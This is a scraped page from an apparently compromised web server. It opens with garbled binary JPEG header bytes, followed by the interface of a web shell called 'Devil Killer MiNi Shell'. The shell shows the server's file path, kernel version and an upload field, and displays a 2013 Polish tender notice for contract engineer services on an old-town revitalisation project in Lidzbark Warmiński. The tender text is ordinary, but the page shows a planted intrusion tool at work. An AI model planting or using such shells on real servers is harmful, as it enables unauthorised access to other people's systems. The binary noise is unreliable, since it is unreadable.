JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/40984-N-2013.html

<p class="kh_header"><b>Lidzbark Warmiński: PEŁNIENIE OBOWIĄZKÓW INŻYNIERA KONTRAKTU DLA PROJEKTU
REWITALIZACJA CENTRUM STAREGO MIASTA W LIDZBARKU WARMIŃSKIM</b><br>
<b>Numer ogłoszenia: 40984 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lidzbarski , Kard. Stefana Wyszyńskiego 37, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. s0-89 767 7900, faks 0-89 767 7903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatlidzbarski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE OBOWIĄZKÓW INŻYNIERA KONTRAKTU DLA PROJEKTU
REWITALIZACJA CENTRUM STAREGO MIASTA W LIDZBARKU WARMIŃSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Pełnienie obowiązków Inżyniera Kontraktu dla Projektu Rewitalizacja centrum starego miasta w Lidzbarku Warmińskim, który będzie wdrożony w ścisłej współpracy z Zamawiającym - Powiatem Lidzbarskim oraz z Zarządem Dróg Powiatowych w Lidzbarku Warmińskim. Projektem objęte zostaną ulice: część ul. Kasprowicza droga powiatowa nr 2709N, ulica Mickiewicza droga powiatowa nr 2719N, ulica Hoża droga powiatowa nr 2706N, ulica Ratuszowa droga powiatowa nr 2724N.

I. Do ogólnych obowiązków Inżyniera Kontraktu należy:

1) Inżynier Kontraktu w ramach wynagrodzenia zapewni zastępstwo inwestorskie, nadzór inwestorski i koordynację robót.
2)	Inżynier Kontraktu pełni zastępstwo inwestorskie w imieniu własnym na rzecz i rachunek Zamawiającego.
3)	Przy realizacji usług Inżynier Kontraktu wykaże niezbędną inicjatywę i szczególną staranność.
4)	Usługi będą wykonane zgodnie z obowiązującymi normami i przepisami.
5)	Inżynier Kontraktu ma obowiązek ustanowienia w imieniu Zamawiającego Inspektorów Nadzoru inwestorskiego we wszystkich branżach oraz koordynatora - zgodnie z art. 27 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (tekst jednolity: Dz. U. 2010 r. Nr 243 poz. 1623 z późn. zm.).
6)	Inżynier Kontraktu - jako podmiot - dysponować będzie kadrą wysoko wykwalifikowanych specjalistów, którymi kierować będzie bezpośrednio Kierownik Projektu - Koordynator Inspektorów nadzoru. Wewnętrzny regulamin zespołu określi Inżynier Kontraktu, który podlega akceptacji Zamawiającego.
7)	Inżynier Kontraktu jest całkowicie odpowiedzialny za odpowiedni dobór zespołu. Podczas  nieobecności któregokolwiek ze specjalistów, wynikającej z urlopu lub przedłużającego się  zwolnienia lekarskiego, Inżynier Kontraktu zapewni czasowe  zastępstwo specjalistów na cały czas  nieobecności zatrudnionych fachowców, by uniknąć opóźnienia w realizacji robót budowlanych. Takie czasowe zastępstwo będzie przedłożone z  wyprzedzeniem na piśmie (łącznie z CV proponowanych  osób), do aprobaty Zamawiającego. Osoby zastępujące czasowo lub na stałe poszczególnych członków zespołu Inżyniera Kontraktu winny odpowiadać minimalnym kryteriom w zakresie doświadczenia zawodowego i posiadanych uprawnień określonego w specyfikacji istotnych warunków zamówienia dla danej funkcji.
8)	Inżynier Kontraktu jest odpowiedzialny za organizację i koordynację realizacji Projektu pod względem finansowym, organizacyjnym, technicznym oraz za współpracę i reprezentowanie w zakresie określonym przez Zamawiającego wszystkich stron realizujących Projekt przed Instytucją Dotującą Projekt.
9)	Inżynier Kontraktu ma zweryfikować dokumentację projektową. Zidentyfikuje także potencjalne obszary problemów oraz podejmie odpowiednie środki zaradcze.
10)	Inżynier Kontraktu jest obowiązany do niezwłocznego informowania Zamawiającego o wszelkich nieprawidłowościach ujawnionych lub mogących mieć wpływ na przeszkody w terminowej realizacji inwestycji.
11)	Usługi Inżyniera Kontraktu winny zapewnić Zamawiającemu prawidłowe wykonanie robót budowlanych.
12)	Inżynier Kontraktu ma kontrolować jakość wykonywanych robót budowlanych oraz stosowanych materiałów, dostarczanych maszyn i urządzeń, dokonywać odbiorów częściowych i końcowego.
13)	Inżynier Kontraktu będzie prowadził rozliczenie budowy w zakresie finansowym i rzeczowym.
14)	Inżynier Kontraktu zobowiązany jest do odbywania spotkań koordynujących z przedstawicielami Zamawiającego i składania sprawozdań, których tematem będą płatności i postęp prac budowlanych. Sprawozdania będą zawierać co najmniej aktualny harmonogram robót,  aktualny harmonogram przepływu gotówki, protokoły odbioru robót ulegających zakryciu lub zanikających. Spotkania winny się odbywać w terminach co najmniej raz na miesiąc.
15)	Opracowywania i przekazania Zamawiającemu miesięcznych i kwartalnych raportów z wykonanego zakresu rzeczowo - finansowego, postępu robót, zagrożeń, stanu BHP, oraz innych istotnych z punktu widzenia prowadzenia inwestycji informacji mających wpływ na jej wykonanie.
16)	Prowadzenie narad koordynacyjnych na budowie w terminach uzgodnionych z Zamawiającym i wykonawcą robót budowlanych, nie rzadziej jednak niż raz w miesiącu.
17)	Opracowania i wdrożenia systemu przepływu informacji pomiędzy uczestnikami procesu inwestycyjnego, w tym opracowanie i przedstawienie Zamawiającemu do akceptacji w terminie do 30 dni od dnia podpisania umowy procedur administracyjnych związanych z prowadzeniem Inwestycji obejmujących między innymi procedury administracyjne związane z obiegiem dokumentacji, prowadzeniem narad koordynacyjnych, raportowaniem, rozliczeniem.
18)	Opracowania i wdrożenia systemu odbioru wykonywanych robót z uwzględnieniem przekazania dokumentacji powykonawczej, dostarczenia kompletu świadectw, atestów, instrukcji obsługi urządzeń oraz innych dokumentów odbioru, a także przedstawienie Zamawiającemu opracowanego systemu, celem zgłoszenia ewentualnych uwag.
19)	Pełnienie funkcji Inżyniera Kontraktu w zakresie prac związanych z ewentualnymi robotami dodatkowymi wynikłymi w trakcie realizacji budowy, niezbędnymi do wykonania robót podstawowych w rozumieniu art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych.
20)	Inżynier Kontraktu ponosi pełną odpowiedzialność za sprawowanie nadzoru ze strony Zamawiającego nad bezpieczeństwem w rejonie prac budowlanych (a w szczególności: nadzór nad planem BIOZ, określanie sposobu należytego zabezpieczenia prac, przerywanie prac mogących być przyczyną katastrofy, pożaru itp.) o wszelkich zagrożeniach obowiązany jest niezwłocznie powiadomić Zamawiającego.
21)	Pełnienie funkcji Inżyniera Kontraktu w zakresie wynikającym z Warunków Kontraktowych dla urządzeń oraz projektowania i budowy dla urządzeń elektrycznych i mechanicznych oraz robót inżynieryjnych i budowlanych projektowanych przez Wykonawcę, (Żółta Książka)  wydanie angielsko-polskie 2000 ISBN 83-86810-13?0 (tłumaczenie pierwszego wydania w języku angielskim 1999 opublikowanego przez Międzynarodową Federację Inżynierów Konsultantów (Fédération Internationale des Ingénieurs-Conseils - FIDIC), P.O. Box 86, CH-1000 Lausanne 12, Szwajcaria dostępne miedzy innymi pod adresem: Wydawnictwo COSMOPOLI CONSULTANTS Biuro Inżynierskie Marek Rdułtowski ul. Kazimierzowska 52, 02-546 Warszawa Tel. (+48 22) 849-0028 fax. (+48 22) 849-1007..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.70.00-1, 71.30.00.00-1, 71.54.00.00-5, 71.52.00.00-9, 71.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2019.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca winien wnieść wadium w wysokości 3 000,00 zł (trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę posiadającego niezbędną wiedzę i doświadczenie Zamawiający uzna takiego, który w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się posiadanym doświadczeniem w wykonaniu usługi pełnienia obowiązków Inwestora Zastępczego, Inżyniera Kontraktu lub Inspektora Zastępczego polegającej na nadzorze nad wykonaniem minimum 2 (dwóch) robót budowlanych polegających na budowie lub przebudowie drogi klasy nie niższej niż Z o wartości minimum  2 400 000 zł brutto każda.
Wykazane przez Wykonawcę usługi muszą być zakończone i odebrane przez ich zleceniodawców. W celu potwierdzenia spełniania wyżej wymienionego warunku udziału w postępowaniu należy złożyć wykaz wykonanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie z podaniem daty wykonania, miejsca, opisu przedmiotu i zakresu zamówienia, wartości robót budowlanych (z uwzględnieniem podatku VAT) oraz zleceniodawców - według wzoru stanowiącego załącznik nr 4 do specyfikacji istotnych warunków zamówienia oraz dokumenty potwierdzające, że usługi wymienione w wykazie zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę dysponującego osobami zdolnymi do wykonania zamówienia uznany zostanie taki, który dysponuje lub będzie dysponować osobami o następujących kwalifikacjach zawodowych uprawniających do sprawowania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 07.07.1994 r. prawo budowlane (Dz. U. Z Dz. U. 2010 r. Nr 243 poz. 1623 z późn. zm.) lub uprawniających do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa:

Minimum jedną osobą do sprawowania funkcji: 
Kierownik Projektu
Specjalista od zarządzania projektami w dziedzinie budownictwa lub drogownictwa. 
Minimalne wymagania:
-	10 lat stażu pracy zawodowej, w tym 5 lat doświadczenia w zarządzaniu projektami w dziedzinie budownictwa lub drogownictwa (w tym planowanie, projektowanie, realizacja inwestycji)
-	Kierowanie min. 1 projektem o wartości nie mniejszej niż 1 000 000,00 PLN
-	doświadczenie w kierowaniu zespołem,
-	wykształcenie wyższe w zakresie drogownictwa lub budownictwa lądowego
-	znajomość i doświadczenie w zakresie stosowania Warunków FIDIC lub równoważnych
-	znajomość procedur przetargowych oraz kontraktowania na podstawie ustawy Prawo zamówień publicznych.

Specjalista obmiarowiec (kosztorysant)
Specjalista w zakresie kosztorysowania, pomiarów i obmiarów robót według uznanych standardów europejskich. Oczekuje się, że Specjalista obmiarowiec spędzi cały czas trwania Projektu w Lidzbarku Warmińskim.
Minimalne wymagania:
-	3 letnie doświadczenie w kosztorysowaniu, obmiarach oraz korzystaniu z Przedmiarów 	Robót w pracach budowlanych,
-	wykształcenie wyższe,
-	znajomość Warunków FIDIC lub równoważnych,
-	znajomość procedur przetargowych oraz kontraktowania na podstawie ustawy Prawo zamówień publicznych.

Inspektor Nadzoru Inwestorskiego (specjalista drogowiec)
Specjalista w zakresie nadzoru inwestorskiego według polskiego prawa budowlanego.
Minimalne wymagania:
-	10 lat stażu pracy zawodowej, w tym 5 lat jako Inspektor Nadzoru Inwestorskiego
-	nadzorowanie robót w zakresie robót drogowych o wartości min. 1 000 000,00 PLN
-	wykształcenie wyższe techniczne,
-	legitymującym się uprawnieniami budowlanymi do nadzorowania  robotami budowlanymi w specjalności drogowej  bez ograniczeń, wydane na podstawie ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jedn.: Dz.U. z Dz. U. 2010 r. Nr 243 poz. 1623 z późn. zm..) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa;

Inspektor Nadzoru Inwestorskiego (specjalista sanitarny)
Specjalista w zakresie nadzoru inwestorskiego według polskiego prawa budowlanego.
Minimalne wymagania:
-	10 lat stażu pracy zawodowej, w tym 5 lat jako Inspektor Nadzoru Inwestorskiego
-	Nadzorowanie min. 1 roboty budowy sieci sanitarnej o długości min. 200m.
-	wykształcenie wyższe techniczne,
-	legitymującym się uprawnieniami budowlanymi do nadzorowania  robotami budowlanymi w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,   wodociągowych i kanalizacyjnych bez ograniczeń, wydane na podstawie ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jedn.: Dz.U. z Dz. U. 2010 r. Nr 243 poz. 1623 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa;
 
Inspektor Nadzoru Inwestorskiego (specjalista elektryk)
Specjalista w zakresie nadzoru inwestorskiego według polskiego prawa budowlanego.
Minimalne wymagania:
-	10 lat stażu pracy zawodowej, w tym 5 lat jako Inspektor Nadzoru Inwestorskiego
-	nadzorowanie min. 1 roboty budowy sieci elektrycznej lub elektroenergetycznej o długości min. 200 m.
	-      wykształcenie wyższe techniczne,
-     legitymującym się uprawnieniami budowlanymi do nadzorowania  robotami budowlanymi w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane na podstawie ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jedn.: Dz.U. z Dz. U.   2010 r. Nr 243 poz. 1623 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane 	na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej 	funkcji na podstawie odrębnych przepisów prawa;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość dokonania zmiany umowy o przedmiotowe zamówienie publiczne w trybie przewidzianym art. 144 ust.1 ustawy w sytuacji:
1)	zmiany terminu realizacji zamówienia w zakresie umowy, z przyczyn nie leżących po stronie Wykonawcy, tj.:
a) zmiany terminu realizacji z powodu wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających w okresie ich występowania realizację przedmiotu zamówienia i mające wpływ na termin wykonania,
b) zmiany terminu realizacji z powodu gdy wystąpi przedłużenie w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia.
2)	okoliczności niezależnych od Inżyniera Kontraktu uniemożliwiających realizację przedmiotu umowy  w terminie, w tym:
a) zmiana zakresu nadzorowanych robót budowlanych, wystąpienie robót zamiennych lub dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego, 
b) wystąpienie przestojów robót budowlanych spowodowanych koniecznością usunięcia uszkodzeń istniejących sieci i urządzeń podziemnych, nieoznaczonych w dokumentacji projektowej lub wstrzymanie wykonania robót przez uprawnione organy, z przyczyn  niewynikających z winy Stron umowy, 
c) wystąpienie Siły Wyższej uniemożliwiającej realizację Projektu.
3)	konieczności zmiany terminu zakończenia wykonania zamówienia, wskazanego we wzorze umowy, spowodowanego wstrzymaniem realizacji robót ze względu na okoliczności niemożliwe do przewidzenia w momencie zawierania umowy;
4)	konieczności zmiany wyznaczonych w umowie inspektorów nadzoru inwestorskiego, koordynatora pracy inspektorów nadzoru;
5)	konieczności zmiany terminu wykonania zamówienia lub terminów płatności będących następstwem zaistnienia siły wyższej;
6)	zmiany uwarunkowań prawnych i formalnych realizacji umowy o zamówienie publiczne, spowodowanych działaniem osób trzecich;
2. Zmiana umowy w zakresie wym. w pkt 1 wymaga aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatlidzbarski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lidzbarku Warmińskim ul. Wyszyńskiego 37, 11-100 Lidzbark Warm., pok. 211.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 11:00, miejsce: Starostwo Powiatowe w Lidzbarku Warmińskim ul. Wyszyńskiego 37, 11-100 Lidzbark Warm., pok. 206 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013.
